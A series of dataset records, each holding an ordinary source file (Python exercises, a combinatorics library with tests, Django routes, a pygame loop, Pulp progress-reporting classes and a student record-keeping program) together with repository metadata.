therefore the following should be true\n    noisy_ansatz_cost_function.estimation_method.assert_called_once()\n\n    # Here, we make the expected executable circuit with the noisy parameters\n    noisy_symbols_map = create_symbols_map(\n        ansatz.parametrized_circuit.free_symbols, noise + params\n    )\n    expected_noisy_circuit = ansatz.parametrized_circuit.bind(noisy_symbols_map)\n\n    assert (\n        noisy_ansatz_cost_function.estimation_method.call_args[0][1][0].circuit\n        == expected_noisy_circuit\n    )\n","sub_path":"tests/zquantum/core/cost_function_test.py","file_name":"cost_function_test.py","file_ext":"py","file_size_in_byte":8819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"359546145","text":"\"\"\"Python Exercise 060: Write a program that\nreads any number and shows its factorial.\nEx: 5! = 5 x 4 x 3 x 2 x 1 = 120\"\"\"\n\nfrom math import factorial\n\nx = int(input('\\033[1;33mEnter a number: '))\ncont = int(x - 1)\n\nprint(f'{x}! 
= {x}', end=' ')\n\nwhile cont >= 1:\n\n print(f'* {cont}', end=' ')\n cont -= 1\n\nprint(f'= {factorial(x)}')\n","sub_path":"ExerciceList/ex060.py","file_name":"ex060.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"316551507","text":"\"\"\"combtools: Extends itertools to provide more combinatorial constructs.\n\nAuthor: Ricardo Bittencourt \n\n\"\"\"\n\nimport itertools\nimport math\nimport random\nimport unittest\n\ndef integer_compositions(n):\n \"\"\"Compositions of an integer (as an ordered sum of positive integers).\n\n Returns an iterator over the compositions of the given integer n.\n Example: n=3 -> 3 = 2+1 = 1+2 = 1+1+1.\n Wiki: http://en.wikipedia.org/wiki/Composition_(combinatorics)\n OEIS: http://oeis.org/search?q=A000079\n Complexity: O(n)/element\n\n Args:\n n: positive integer to be represented as a composition.\n Returns:\n an iterator over the compositions of n. Each composition is a list\n of integers, whose sum is n.\n \"\"\"\n if n == 0:\n yield []\n else:\n yield [n]\n for i in range(n - 1, 0, -1):\n for composition in integer_compositions(n - i):\n yield [i] + composition\n\n\ndef integer_partitions(n):\n \"\"\"Partitions of an integer (as an unordered sum of positive integers).\n\n Returns an iterator over the compositions of the given integer n.\n Example: n=3 -> 3 = 2+1 = 1+1+1.\n Wiki: http://en.wikipedia.org/wiki/Partition_(number_theory)\n OEIS: http://oeis.org/search?q=A000041\n Complexity: O(n)/element\n\n Args:\n n: positive integer to be represented as a partition.\n Returns:\n an iterator over the partitions of n. Each partition is a list\n of integers, whose sum is n.\n \"\"\"\n def _partitions(n, max_term):\n \"\"\"Partitions of n where no term is greater than max_term.\"\"\"\n if n == 0:\n yield []\n else:\n for i in range(max_term, 0, -1):\n for partition in _partitions(n - i, min(n - i, i)):\n yield [i] + partition\n return _partitions(n, n)\n\n\ndef set_partitions(seq):\n \"\"\"Partitions of a set.\n\n Returns an iterator over the set partitions of a sequence.\n Example: seq=1,2,3 -> 123, 1|2|3, 12|3, 13|2, 1|23\n Wiki: http://en.wikipedia.org/wiki/Partition_of_a_set\n OEIS: http://oeis.org/search?q=A000110\n Complexity: O(n)/element\n\n Args:\n seq: a sequence to be partitioned.\n Returns:\n an iterator over the set partitions of seq. Each partition is a list\n of elements of seq, whose union is seq.\n \"\"\"\n def gen(pos, max_term, cur):\n if pos == n:\n yield cur\n else:\n for i in range(0, 1 + max_term):\n updated = cur + [i]\n for elem in gen(pos + 1, max(updated) + 1, updated):\n yield elem\n def convert(partition):\n for encoded in partition:\n ans = [[] for i in range(n)]\n for i, j in enumerate(encoded):\n ans[j].append(seq[i])\n yield [x for x in ans if x]\n n = len(seq)\n return convert(gen(1, 1, [0]))\n\n\ndef bracketings(n):\n \"\"\"Bracketings on n letters.\n\n Returns an iterator over all bracketings on n letters, represented\n as trees with n leaves and no unary branches.\n Example: n=3 -> ((ab)c) (a(bc)) (abc)\n Info: http://mathworld.wolfram.com/Bracketing.html\n OEIS: http://oeis.org/search?q=A000110\n Complexity: O(n)/element\n\n Args:\n n: positive integer with the size of the bracketings\n Returns:\n an iterator over all bracketings on n letters of seq. 
Each bracketing\n is represented as tree, where an internal node is a tuple of tuples,\n and an external node is the empty tuple.\n \"\"\"\n if n == 1:\n yield ()\n for part in integer_compositions(n):\n if len(part) > 1:\n for brac in itertools.product(*(bracketings(i) for i in part)):\n yield brac\n\n\ndef permutations(seq):\n \"\"\"Permutations of a sequence.\n\n Returns an iterator over all permutations of a sequence.\n Example: n=3 -> 123, 132, 213, 231, 312, 321\n Wiki: http://en.wikipedia.org/wiki/Permutation\n OEIS: http://oeis.org/search?q=A000142\n Complexity: O(n)/element\n\n Args:\n seq: sequence to be permutated.\n Returns:\n an iterator over all permutations of the sequence.\n \"\"\"\n return itertools.permutations(seq)\n\n\ndef random_permutation(seq):\n answer = list(seq)\n random.shuffle(answer)\n return answer\n\ndef random_cycle(seq):\n # Knuth shuffle\n n = len(seq)\n seq = list(seq)\n for i in range(n-1 , 0, -1):\n pos = random.randint(0, i)\n seq[i], seq[pos] = seq[pos], seq[i]\n return seq\n\n\ndef _is_reverse_sorted(seq):\n for i in range(len(seq) - 1):\n if seq[i] < seq[i + 1]:\n return False\n return True\n\n\ndef _immutable(seq):\n if isinstance(seq, list):\n return tuple(_immutable(i) for i in seq)\n else:\n return seq\n\n\nclass _CombtoolsTest(unittest.TestCase):\n \"\"\"Unit tests.\"\"\"\n\n def _unique_len(self, seq):\n seq = list(seq)\n size = len(seq)\n self.assertEqual(size, len(set(_immutable(i) for i in seq)))\n return size\n\n def _flatten_sort(self, seq):\n return list(sorted(itertools.chain(*seq)))\n\n def test_integer_compositions(self):\n # Sizes given by OEIS A000079.\n self.assertEqual(\n [1, 2, 4, 8, 16, 32, 64, 128],\n [self._unique_len(integer_compositions(i)) for i in range(1,9)])\n\n for n in range(1, 9):\n for composition in integer_compositions(n):\n # Terms must sum to n.\n self.assertEqual(n, sum(composition))\n # Terms must be less or equal to n.\n self.assertTrue(all(i <= n for i in composition))\n\n for n in range(1, 9):\n # Results must be in reverse lexicographical order.\n self.assertTrue(\n _is_reverse_sorted(list(integer_compositions(n))))\n\n def test_integer_partitions(self):\n # Sizes given by OEIS A000041.\n self.assertEqual(\n [1, 2, 3, 5, 7, 11, 15, 22],\n [self._unique_len(integer_partitions(i)) for i in range(1,9)])\n\n for n in range(1, 9):\n for partition in integer_partitions(n):\n # Terms must sum to n.\n self.assertEqual(n, sum(partition))\n # Terms must be less or equal to n.\n self.assertTrue(all(i <= n for i in partition))\n # Terms must be sorted.\n self.assertTrue(_is_reverse_sorted(partition))\n\n for n in range(1, 9):\n # Results must be in reverse lexicographical order.\n self.assertTrue(\n _is_reverse_sorted(list(integer_partitions(n))))\n\n def test_set_partitions(self):\n # Sizes given by OEIS A000110.\n self.assertEqual(\n [1, 2, 5, 15, 52, 203, 877, 4140],\n [self._unique_len(set_partitions(range(i))) for i in range(1,9)])\n\n for n in range(1, 9):\n for partition in set_partitions(range(n)):\n # Terms must be lists of lists.\n self.assertTrue(all(isinstance(i, list) for i in partition))\n # After flattening and sorting, must be equal to range(n).\n self.assertEqual(range(n), self._flatten_sort(partition))\n\n def _is_bracketing(self, brac):\n if len(brac) == 1:\n return brac == ()\n else:\n return all(self._is_bracketing(b) for b in brac)\n\n def test_bracketings(self):\n # Sizes given by OEIS A001003.\n self.assertEqual(\n [1, 1, 3, 11, 45, 197, 903, 4279],\n [self._unique_len(bracketings(i)) for i in 
range(1,9)])\n\n for n in range(1, 9):\n for bracketing in bracketings(n):\n # Terms must be bracketings.\n self.assertTrue(self._is_bracketing(bracketing))\n\n def test_permutations(self):\n # Sizes given by OEIS A000142.\n self.assertEqual(\n [1, 2, 6, 24, 120, 720, 5040, 40320],\n [self._unique_len(permutations(range(i))) for i in range(1,9)])\n\n for n in range(1, 9):\n for permutation in permutations(range(n)):\n # After sorting, must be equal to range(n).\n self.assertEqual(range(n), sorted(permutation))\n\n def _uniform_chi_square(self, universe, get_sample): \n universe_map = {tuple(elem): i for i, elem in enumerate(universe)}\n size = len(universe_map)\n hist = [0] * size\n # The expected value for chi-square must be greater than 5.\n # We're taking ten times that for safety.\n expected = 50\n for _ in range(expected * size):\n hist[universe_map[tuple(get_sample())]] += 1\n chi_square = sum(((h - expected) ** 2) / float(expected) for h in hist)\n # When degrees > 50, the expression below is asymptotic to a normal\n # distribution N(0,1). We're rejecting anything beyond 3 sigma,\n # which is about 99.7%.\n degrees = size - 1\n return abs(chi_square - degrees) / (2 * degrees) ** 0.5 < 3\n\n def test_random_permutation(self):\n size = 5\n seq = range(size)\n all_permutations = permutations(seq)\n gen_permutations = lambda: random_permutation(seq)\n self.assertTrue(self._uniform_chi_square(\n all_permutations, gen_permutations))\n \nif __name__ == '__main__':\n unittest.main()\n","sub_path":"combtools.py","file_name":"combtools.py","file_ext":"py","file_size_in_byte":9341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"271006254","text":"\n\nfrom xai.brain.wordbase.nouns._siding import _SIDING\n\n#calss header\nclass _SIDINGS(_SIDING, ):\n\tdef __init__(self,): \n\t\t_SIDING.__init__(self)\n\t\tself.name = \"SIDINGS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"siding\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_sidings.py","file_name":"_sidings.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"275020424","text":"def fibo(num):\r\n if num<=1:\r\n return num\r\n else:\r\n return (fibo(num-1) + fibo(num-2))\r\n \r\nn = int(input(\"Enter a number : \"))\r\n\r\nif n<=0:\r\n print(\"Please enter a positive number\")\r\nelse:\r\n print(\"Fibonacci sequence: \")\r\n for i in range(n):\r\n print(fibo(i))\r\n ","sub_path":"Python/Activities/Activities/Activity14.py","file_name":"Activity14.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"71602533","text":"\"\"\"\nIntroduced panda reader to limit the data we read in the csv to two columns.\n\"\"\"\n\nimport datetime\nimport csv\nimport time\nimport pandas\n\ndef analyze(filename):\n \"\"\"Count instances of each year and 'ao' in a csv file.\"\"\"\n\n start = time.time()\n\n data = pandas.read_csv(filename)\n# with open(filename) as csvfile:\n# reader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n\n year_count = {\n \"2013\": 0,\n \"2014\": 0,\n \"2015\": 0,\n \"2016\": 0,\n \"2017\": 0,\n \"2018\": 0\n }\n\n ao_count = 0\n print(data.Date[0])\n \n for date in data.Date:\n year_count[date[-4:]] += 1\n\n for cell in data.a_o:\n if 'ao' in str(cell):\n ao_count += 1\n\n print(year_count)\n print(f\"'ao' was found {ao_count} times\")\n\n print(f'{time.time() - start} 
seconds')\n\n return (year_count, ao_count)\n\ndef main():\n filename = \"data/exercise.csv\"\n analyze(filename)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"students/steve_walker/lesson06/assignment/archived_trials/time_trial_5.py","file_name":"time_trial_5.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"418887236","text":"from django.urls import path\nfrom . import views\napp_name = 'Courses'\n\nurlpatterns=[\n path('category_list/' , views.category_list , name = 'category_list'),\n path('programming_list/' , views.programming_list , name = 'programming_list'),\n path('design_list/' , views.design_list , name = 'design_list'),\n path('development_list/' , views.development_list , name = 'development_list'),\n path('lang_list/' , views.lang_list , name = 'lang_list'),\n path('network_list/' , views.network_list , name = 'network_list'),\n path('secuirty_list/' , views.secuirty_list , name = 'secuirty_list'),\n path('system_list/' , views.system_list , name = 'system_list'),\n path('database_list/' , views.database_list , name = 'database_list'),\n\n path('rate//' , views.rate , name = 'rate'), \n path ('course_details//detail', views.course_detail, name = 'course_details'),\n path ('course_contante//contante', views.course_contante, name = 'course_contante'),\n path ('course_contante//register', views.enroll_courses, name = 'course_enroll'),\n path ('video_content//', views.video_content, name = 'video_content'),\n \n \n]","sub_path":"Courses/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"100731146","text":"import pygame\nfrom pygame.locals import *\n\nfrom constants import *\n\nclass Engine (object):\n def __init__(self, resolution, fullscreen=False):\n pygame.init()\n flag = 0\n if fullscreen:\n flag = pygame.FULLSCREEN\n self.display = pygame.display.set_mode(resolution, flag)\n self.bg_img = pygame.Surface(resolution)\n self.bg_img.fill(COL_BG)\n self.clock = pygame.time.Clock()\n self.is_runnning = True\n self.sprites = pygame.sprite.LayeredDirty()\n\n def run(self):\n while self.is_runnning:\n self._handle_events()\n self._update()\n self._render()\n\n def _handle_events(self):\n for event in pygame.event.get():\n if event.type == QUIT:\n self.is_runnning = False\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n self.is_runnning = False\n elif event.type == MOUSEBUTTONDOWN:\n for sprite in self.sprites:\n sprite.on_mouse_down(event)\n\n def _update(self):\n dt = self.clock.tick(30)\n self.sprites.update(dt)\n \n\n def _render(self):\n self.sprites.clear(self.display, self.bg_img)\n dirty_rects = self.sprites.draw(self.display)\n pygame.display.update(dirty_rects)\n\n\n","sub_path":"src/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"188934308","text":"# -*- coding: utf-8 -*-\n#\n# Copyright © 2013 Red Hat, Inc.\n#\n# This software is licensed to you under the GNU General Public\n# License as published by the Free Software Foundation; either version\n# 2 of the License (GPLv2) or (at your option) any later version.\n# There is NO WARRANTY for this software, express or implied,\n# including the implied warranties of MERCHANTABILITY,\n# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. 
You should\n# have received a copy of GPLv2 along with this software; if not, see\n# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.\n\"\"\"\nContains classes and functions related to tracking the progress of the ISO\nimporter and distributor.\n\"\"\"\nfrom datetime import datetime\n\nfrom pulp_rpm.common import reporting\nfrom pulp_rpm.common.constants import STATE_COMPLETE, STATE_FAILED, STATE_NOT_STARTED, STATE_RUNNING\n\n\nclass ISOProgressReport(object):\n def __init__(self, conduit):\n self.conduit = conduit\n\n # These variables track the state of the ISO download stage\n self._isos_state = STATE_NOT_STARTED\n self.isos_execution_time = None\n self.isos_total_count = None\n self.isos_finished_count = 0\n self.isos_error_count = 0\n # mapping of iso to its error\n self.isos_individual_errors = {}\n # overall execution error\n self.isos_error_message = None\n self.isos_exception = None\n self.isos_traceback = None\n\n # Manifest download and generation\n self._manifest_state = STATE_NOT_STARTED\n self.manifest_execution_time = None\n self.manifest_error_message = None\n self.manifest_exception = None\n self.manifest_traceback = None\n\n def add_failed_iso(self, iso, error_report):\n \"\"\"\n Updates the progress report that a iso failed to be imported.\n \"\"\"\n self.isos_error_count += 1\n self.isos_individual_errors[iso['name']] = {\n 'error_report': error_report,\n }\n\n def build_progress_report(self):\n \"\"\"\n Returns the actual report that should be sent to Pulp as the current\n progress of the sync.\n\n :return: description of the current state of the sync\n :rtype: dict\n \"\"\"\n\n report = {\n 'manifest': self._generate_manifest_section(),\n 'isos': self._generate_isos_section(),\n }\n return report\n\n @classmethod\n def from_progress_dict(cls, report):\n \"\"\"\n Parses the output from the build_progress_report method into an instance\n of this class. 
The intention is to use this client-side to reconstruct\n the instance as it is retrieved from the server.\n\n The build_final_report call on instances returned from this call will\n not function as it requires the server-side conduit to be provided.\n Additionally, any exceptions and tracebacks will be a text representation\n instead of formal objects.\n\n :param report: progress report retrieved from the server's task\n :type report: dict\n :return: instance populated with the state in the report\n :rtype: SyncProgressReport\n \"\"\"\n\n r = cls(None)\n\n m = report['manifest']\n r.manifest_state = m['state']\n r.manifest_execution_time = m['execution_time']\n r.manifest_error_message = m['error_message']\n r.manifest_exception = m['error']\n r.manifest_traceback = m['traceback']\n\n m = report['isos']\n r.isos_state = m['state']\n r.isos_execution_time = m['execution_time']\n r.isos_total_count = m['total_count']\n r.isos_finished_count = m['finished_count']\n r.isos_error_count = m['error_count']\n r.isos_individual_errors = m['individual_errors']\n r.isos_error_message = m['error_message']\n r.isos_exception = m['error']\n r.isos_traceback = m['traceback']\n\n return r\n\n def _get_isos_state(self):\n return self._isos_state\n\n def _set_isos_state(self, new_state):\n self._set_timed_state('_isos_state', '_isos_start_time', 'isos_execution_time', new_state)\n\n isos_state = property(_get_isos_state, _set_isos_state)\n\n def _get_manifest_state(self):\n return self._manifest_state\n\n def _set_manifest_state(self, new_state):\n self._set_timed_state('_manifest_state', '_manifest_start_time', 'manifest_execution_time', new_state)\n\n manifest_state = property(_get_manifest_state, _set_manifest_state)\n\n def update_progress(self):\n \"\"\"\n Sends the current state of the progress report to Pulp.\n \"\"\"\n report = self.build_progress_report()\n self.conduit.set_progress(report)\n\n def _generate_isos_section(self):\n isos_report = {\n 'state': self.isos_state,\n 'execution_time': self.isos_execution_time,\n 'total_count': self.isos_total_count,\n 'finished_count': self.isos_finished_count,\n 'error_count': self.isos_error_count,\n 'individual_errors': self.isos_individual_errors,\n 'error_message': self.isos_error_message,\n 'error': reporting.format_exception(self.isos_exception),\n 'traceback': reporting.format_traceback(self.isos_traceback),\n }\n return isos_report\n\n def _generate_manifest_section(self):\n manifest_report = {\n 'state': self.manifest_state,\n 'execution_time': self.manifest_execution_time,\n 'error_message': self.manifest_error_message,\n 'error': reporting.format_exception(self.manifest_exception),\n 'traceback': reporting.format_traceback(self.manifest_traceback),\n }\n return manifest_report\n\n def _set_timed_state(self, state_attribute_name, start_time_attribute_name, execution_time_attribute_name,\n new_state):\n \"\"\"\n For the manifest_state and isos_state attributes, we have special setter properties that also time\n how long it takes them to move from a running state to a complete or failed state. 
This method is used\n by both of those properties to keep track of how long the state transition takes, and it also sets the\n appropriate state on the progress report.\n\n :param state_attribute_name: The name of the attribute on self where the new state should be\n stored\n :type state_attribute_name: basestring\n :param start_time_attribute_name: The name of an attribute on self that should be used to store\n the time when the attribute entered a running state.\n :type start_time_attribute_name: basestring\n :param execution_time_attribute_name: The name of an attribute on self that should be used to store\n the calculated execution time.\n :type execution_time_attribute_name: basestring\n :param new_state: The new state that should be set onto self.state_attribute_name\n :type new_state: basestring\n \"\"\"\n current_state = getattr(self, state_attribute_name)\n if current_state == STATE_NOT_STARTED and new_state == STATE_RUNNING:\n setattr(self, start_time_attribute_name, datetime.utcnow())\n\n if current_state == STATE_RUNNING and new_state in [STATE_COMPLETE, STATE_FAILED]:\n execution_time = datetime.utcnow() - getattr(self, start_time_attribute_name)\n execution_time = (execution_time.days * 3600 * 24) + \\\n execution_time.seconds\n setattr(self, execution_time_attribute_name, execution_time)\n\n setattr(self, state_attribute_name, new_state)\n\n\nclass PublishProgressReport(ISOProgressReport):\n \"\"\"\n Used to carry the state of the publish run as it proceeds. This object is used\n to update the on going progress in Pulp at appropriate intervals through\n the update_progress call. Once the publish is finished, this object should\n be used to produce the final report to return to Pulp to describe the\n result of the operation.\n \"\"\"\n def __init__(self, conduit):\n super(self.__class__, self).__init__(conduit)\n\n # Publishing state\n self.publish_http = STATE_NOT_STARTED\n self.publish_https = STATE_NOT_STARTED\n\n def build_final_report(self):\n \"\"\"\n Assembles the final report to return to Pulp at the end of the run.\n\n :return: report to return to Pulp at the end of the publish call\n :rtype: pulp.plugins.model.PublishReport\n \"\"\"\n\n # Report fields\n total_execution_time = -1\n if self.manifest_execution_time is not None and self.isos_execution_time is not None:\n total_execution_time = self.manifest_execution_time + self.isos_execution_time\n\n summary = {\n 'total_execution_time': total_execution_time\n }\n\n # intentionally empty; not sure what to put in here\n details = {}\n\n # Determine if the report was successful or failed\n all_step_states = (self.manifest_state, self.isos_state, self.publish_http,\n self.publish_https)\n unsuccessful_steps = [s for s in all_step_states if s != STATE_COMPLETE]\n\n if len(unsuccessful_steps) == 0:\n report = self.conduit.build_success_report(summary, details)\n else:\n report = self.conduit.build_failure_report(summary, details)\n\n return report\n\n def build_progress_report(self):\n \"\"\"\n Returns the actual report that should be sent to Pulp as the current\n progress of the publish.\n\n :return: description of the current state of the publish\n :rtype: dict\n \"\"\"\n report = super(self.__class__, self).build_progress_report()\n report['publishing'] = self._generate_publishing_section()\n return report\n\n @classmethod\n def from_progress_dict(cls, report):\n \"\"\"\n Parses the output from the build_progress_report method into an instance\n of this class. 
The intention is to use this client-side to reconstruct\n the instance as it is retrieved from the server.\n\n The build_final_report call on instances returned from this call will\n not function as it requires the server-side conduit to be provided.\n Additionally, any exceptions and tracebacks will be a text representation\n instead of formal objects.\n\n :param report: progress report retrieved from the server's task\n :type report: dict\n :return: instance populated with the state in the report\n :rtype: PublishProgressReport\n \"\"\"\n r = super(cls).from_progress_dict(report)\n\n m = report['publishing']\n r.publish_http = m['http']\n r.publish_https = m['https']\n\n return r\n\n def _generate_publishing_section(self):\n publishing_report = {\n 'http': self.publish_http,\n 'https': self.publish_https,\n }\n return publishing_report\n\n\nclass SyncProgressReport(ISOProgressReport):\n \"\"\"\n Used to carry the state of the sync run as it proceeds. This object is used\n to update the on going progress in Pulp at appropriate intervals through\n the update_progress call. Once the sync is finished, this object should\n be used to produce the final report to return to Pulp to describe the\n sync.\n \"\"\"\n def __init__(self, conduit):\n super(self.__class__, self).__init__(conduit)\n\n # Let's also track how many bytes we've got on the ISOs\n self.isos_total_bytes = None\n self.isos_finished_bytes = 0\n\n def build_final_report(self):\n \"\"\"\n Assembles the final report to return to Pulp at the end of the sync.\n The conduit will include information that it has tracked over the\n course of its usage, therefore this call should only be invoked\n when it is time to return the report.\n \"\"\"\n if self.isos_error_count != 0:\n self.isos_state = STATE_FAILED\n\n # Report fields\n total_execution_time = -1\n if self.manifest_execution_time is not None and self.isos_execution_time is not None:\n total_execution_time = self.manifest_execution_time + self.isos_execution_time\n\n summary = {\n 'total_execution_time': total_execution_time\n }\n\n details = {\n 'total_count': self.isos_total_count,\n 'finished_count': self.isos_finished_count,\n 'error_count': self.isos_error_count,\n }\n\n # Determine if the report was successful or failed\n all_step_states = (self.manifest_state, self.isos_state)\n unsuccessful_steps = [s for s in all_step_states if s != STATE_COMPLETE]\n\n if len(unsuccessful_steps) == 0:\n report = self.conduit.build_success_report(summary, details)\n else:\n report = self.conduit.build_failure_report(summary, details)\n\n return report\n\n def _generate_isos_section(self):\n isos_report = super(self.__class__, self)._generate_isos_section()\n isos_report['total_bytes'] = self.isos_total_bytes\n isos_report['finished_bytes'] = self.isos_finished_bytes\n return isos_report","sub_path":"pulp_rpm/src/pulp_rpm/common/progress.py","file_name":"progress.py","file_ext":"py","file_size_in_byte":13404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"152904984","text":"import random, os, pickle\nfrom registros import *\n\n\ndef carga(v, n):\n medicamentos = (\"COBRÉ1.\", \"PLOMO1234.\", \"zinc4.\", \"ÉSTAÑO5.\", \"HIERRO51.\", \"manganeso5\", \"1m2olibdeno5\", \"cobalto\",\n \"Posible VACUNA1 contra el maldito COVID-19.\", \"titan4567io\", \"cromo\", \"oro\", \"plata\", \"platino\", \"plutonio\", \"uranio\", \"radio\",\n \"torio\", \"mairene\", \"potasio \", \"yodo \", \"carbonato \", \"cloruro\", \"sulfato\",\n \"dolomita\")\n 
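# candidate director names for the synthetic records; carga pairs one with\n    # a random id, amount, type and endorsements count\n    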
directores = (\"Bruno\", \"Mariel\", \"Bianca\", \"Juan Cruz\", \"Jorge\", \"Antonela\", \"Josefina\", \"Lea\",\n                  \"Aylen\", \"Exequiel\", \"Lilith\", \"Lou\", \"Luz\", \"Lautaro\", \"Tomas\", \"Azul\", \"Cecilia\",\n                  \"Agustin\", \"Mairene\", \"Angelo\", \"Angela\", \"Celeste\", \"Karen\", \"Ludmila\", \"Francisca\")\n    idstr = (\"A\", \"B\", \"C\", \"D\", \"E\")\n    for i in range(n):\n        id = str(random.randint(1, 10)) + random.choice(idstr)\n        descripcion = random.choice(medicamentos)\n        director = random.choice(directores)\n        monto = random.randint(100, 100000)\n        tipo = random.randint(1, 30)\n        avales = random.randint(0, 9)\n        new = Medicamento(id, descripcion, director, monto, tipo, avales)\n        add_in_order(v, new)\n    return v\n\n\n# Ordered insertion (binary search for the position)\ndef add_in_order(v, nuevo):\n    n = len(v)\n    pos = n\n    izq, der = 0, n - 1\n    while izq <= der:\n        c = (izq + der) // 2\n        if v[c].id == nuevo.id:\n            pos = c\n            break\n        if nuevo.id < v[c].id:\n            der = c - 1\n        else:\n            izq = c + 1\n    if izq > der:\n        pos = izq\n    v[pos:pos] = [nuevo]\n\n\ndef mostrar(v):\n    n = len(v)\n    for i in range(n):\n        to_string(v[i])\n\n\ndef menu():\n    print(\"1-Load data\")\n    print(\"2-Show the array one item per line\")\n    print(\"3-Search the array for a director\")\n    print(\"4-Search for a key by id K\")\n    print(\"5-Accumulation matrix\")\n    print(\"6-Generate file\")\n    print(\"7-Show file\")\n    print(\"8-Analyze string\")\n    print(\"9-Exit\")\n    sep()\n    op = validar_rango(1, 9, \"Enter a menu option: \")\n    return op\n\n\ndef sep():\n    print(\"=\" * 30)\n\n\n# Validations\ndef validar_monto(mensaje):\n    monto = float(input(mensaje))\n    while monto < 0:\n        print('Invalid! It must be a positive value.')\n        monto = float(input(mensaje))\n    return monto\n\n\ndef validar_pos(a):\n    n = a\n    while n <= a:\n        n = int(input(\"Enter the value n to load into the array (greater than \" + str(a) + \"):\"))\n        if n <= a:\n            print(\"Error, enter a value greater than:\", a)\n    return n\n\n\ndef validar_rango(inf, sup, mensaje):\n    n = inf - 1\n    while inf > n or n > sup:\n        n = int(input(mensaje))\n        if n < inf or n > sup:\n            print(\"Error... 
invalid option, enter a value between \" + str(inf) + \" and \" + str(sup))\n    return n\n\n\ndef busqueda_secuencial(v, nom):\n    for i in range(len(v)):\n        if v[i].director == nom:\n            return i\n    return -1\n\n\ndef binary_search(v, x):\n    izq, der = 0, len(v) - 1\n    while izq <= der:\n        c = (izq + der) // 2\n        if x == v[c].id:\n            return c\n        if x < v[c].id:\n            der = c - 1\n        else:\n            izq = c + 1\n    return -1\n\n\ndef crear_matriz(v):\n    conteo = [[0] * 30 for i in range(10)]\n    for i in v:\n        c = i.tipo\n        f = i.avales\n        conteo[f][c] += i.monto\n    return conteo\n\n\ndef mostrar_matriz(conteo, v, m):\n    print()\n    for i in range(len(conteo)):\n        for j in range(len(conteo[i])):\n            if conteo[i][j] != 0:\n                print(\"The accumulated amount with type \", i, \" and endorsements \", j, \" is: $\", conteo[i][j])\n\n\n# File handling\ndef crear_archivo(v, fd):\n    m = open(fd, \"wb\")\n    n = len(v)\n    for i in range(n):\n        # assumption: the intended filter is on the description length (the\n        # original compared the description string with 25, a TypeError)\n        if len(v[i].descripcion) >= 25 and v[i].tipo != 15 and v[i].tipo != 10:\n            pickle.dump(v[i], m)\n    print(\"File generated!\")\n    m.close()\n\n\ndef mostrar_archivo(fd):\n    if not os.path.exists(fd):\n        print(\"The file does not exist, generate it with the previous option\")\n        return\n\n    m = open(fd, \"rb\")\n    tamano = os.path.getsize(fd)\n\n    print(\"File contents: \")\n    while m.tell() < tamano:\n        a = pickle.load(m)\n        if a.monto > 100000:\n            to_string(a)\n    m.close()\n\n\ndef extra(cadena):\n    if len(cadena) <= 0:\n        print(\"You must first generate the string with option 3\")\n        return\n\n    letras = \"abcdefghijkmñlopqrstuvwxyzaeiouáéíóú\"\n    mayus = letras.upper()\n    rango = len(cadena)\n    cumple_condicion = 0\n    hay_min = hay_mayus = False\n    hay_digito = 0\n    for i in cadena:\n        print(i)\n        if i != \" \" and i != \".\":\n            if i in letras:\n                hay_min = True\n                print(\"lowercase\", hay_min)\n            if i in mayus:\n                hay_mayus = True\n                print(\"uppercase\", hay_mayus)\n            if i.isdigit():\n                hay_digito += 1\n                print(\"digit\", hay_digito)\n        else:\n            if (hay_min == False) and (hay_mayus == True) and (hay_digito >= 1):\n                cumple_condicion += 1\n                print(\"match\")\n\n            hay_min = hay_mayus = False\n            hay_digito = 0\n    print(\"The number of words in the string that meet the condition is: \", cumple_condicion)\n\ndef principal():\n    v = []\n    fd = \"vector.dat\"\n    op = -1\n    cadena = \"\"\n    while op != 9:\n        op = menu()\n        if op == 1:\n            n = int(input(\"Enter the number of medications to load: \"))\n            v = carga(v, n)\n            print(\"Vector loaded successfully!\")\n            sep()\n        elif op == 2:\n            if len(v) != 0:\n                mostrar(v)\n            else:\n                print(\"You must load the data first (option 1)\")\n            sep()\n        elif op == 3:\n            if len(v) != 0:\n                nom = input(\"Enter the director: \")\n                res = busqueda_secuencial(v, nom)\n                if res != -1:\n                    print(v[res].descripcion)\n                    cadena = v[res].descripcion\n                else:\n                    print(\"No such director exists...\")\n            else:\n                print(\"You must load the data first (option 1)\")\n            sep()\n        elif op == 4:\n            if len(v) != 0:\n                k = input(\"Enter the id: \")\n                res = binary_search(v, k)\n                if res != -1:\n                    to_string(v[res])\n                else:\n                    print(\"No such id exists...\")\n            else:\n                print(\"You must load the data first (option 1)\")\n            sep()\n        elif op == 5:\n            if len(v) != 0:\n                matriz = crear_matriz(v)\n                print(\"Matrix created successfully!\")\n                m = int(input(\"Enter the value to filter by: \"))\n                mostrar_matriz(matriz, v, m)\n            else:\n                print(\"You must load the data first (option 1)\")\n            sep()\n        elif op == 6:\n            crear_archivo(v, fd)\n            sep()\n        elif op == 7:\n            mostrar_archivo(fd)\n            sep()\n        elif op == 8:\n            extra(cadena)\n            sep()\n        elif op == 9:\n            print(\"Thank you for using the 